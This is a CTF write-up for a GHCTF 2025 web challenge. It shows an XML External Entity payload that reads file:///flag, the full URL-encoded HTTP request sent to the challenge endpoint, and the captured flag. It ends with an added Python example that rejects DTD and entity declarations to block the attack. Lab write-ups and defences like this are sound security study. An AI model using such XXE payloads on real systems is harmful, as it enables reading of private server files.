Problem: [GHCTF 2025](https://www.nssctf.cn/problem/6578)
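After auditing the code, we find that we need to submit XML to /ghctf.
The endpoint reads the XML.
So the XML we inject has to retrieve the flag we want.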
```xml
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///flag">]>
<root>
<name>&xxe;</name>
</root>
```
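This is a typical XXE (XML External Entity) attack payload.
The audit shows that the name tag is read, so we only need to get file:///flag.
file://: the URI scheme, meaning access to the local file system
/flag: the usual default location of the flag file in CTF competitions
If it is not there, we would have to run ls and search for it.
Here, though, that was the end of it.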
```http
POST /ghctf HTTP/1.1
Host: node1.anna.nssctf.cn:28950
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1727873749,1728461632
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded

xml=%3C%21DOCTYPE%20root%20%5B%0A%20%20%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fflag%22%3E%0A%5D%3E%0A%3Croot%3E%0A%20%20%3Cname%3E%26xxe%3B%3C%2Fname%3E%0A%3C%2Froot%3E
```
NSSCTF{56d4e8df-0eb8-4be0-9cb9-1efa004bd0b5}
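
The defensive counterpart to the request above, as an added example that is not the challenge's own code: it assumes a Python handler (the page does not show the server source), and the names `safe_extract_name`, `ForbiddenXML` and `is_rejected` are hypothetical. It decodes the `xml` form field and refuses any document that declares a DTD or an entity, so the `file:///flag` entity is rejected before anything resolves it.

```python
# Added example. Assumption: the server is Python; all names are hypothetical.
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs
from xml.parsers import expat

# Request body taken from the page, and a constructed benign body.
PAGE_BODY = ("xml=%3C%21DOCTYPE%20root%20%5B%0A%20%20%3C%21ENTITY%20xxe%20SYSTEM"
             "%20%22file%3A%2F%2F%2Fflag%22%3E%0A%5D%3E%0A%3Croot%3E%0A%20%20"
             "%3Cname%3E%26xxe%3B%3C%2Fname%3E%0A%3C%2Froot%3E")
BENIGN_BODY = "xml=%3Croot%3E%3Cname%3Ealice%3C%2Fname%3E%3C%2Froot%3E"


class ForbiddenXML(ValueError):
    """Raised when a document is malformed or declares a DTD or entity."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise ForbiddenXML("DOCTYPE declarations are not allowed")


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    raise ForbiddenXML(f"entity declaration not allowed: {name}")


def safe_extract_name(form_body: str) -> str:
    """Decode the `xml` form field and return the <name> text, refusing DTDs."""
    xml_text = parse_qs(form_body).get("xml", [""])[0]
    # Pass 1: scan with expat; the handlers abort on any DTD or entity declaration.
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity
    try:
        parser.Parse(xml_text.encode(), True)
    except expat.ExpatError as exc:
        raise ForbiddenXML(f"malformed XML: {exc}") from exc
    # Pass 2: the document is known to be DTD-free, so build the tree.
    return ET.fromstring(xml_text).findtext("name", default="")


def is_rejected(form_body: str) -> bool:
    """True if the body is refused by safe_extract_name."""
    try:
        safe_extract_name(form_body)
    except ForbiddenXML:
        return True
    return False
```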
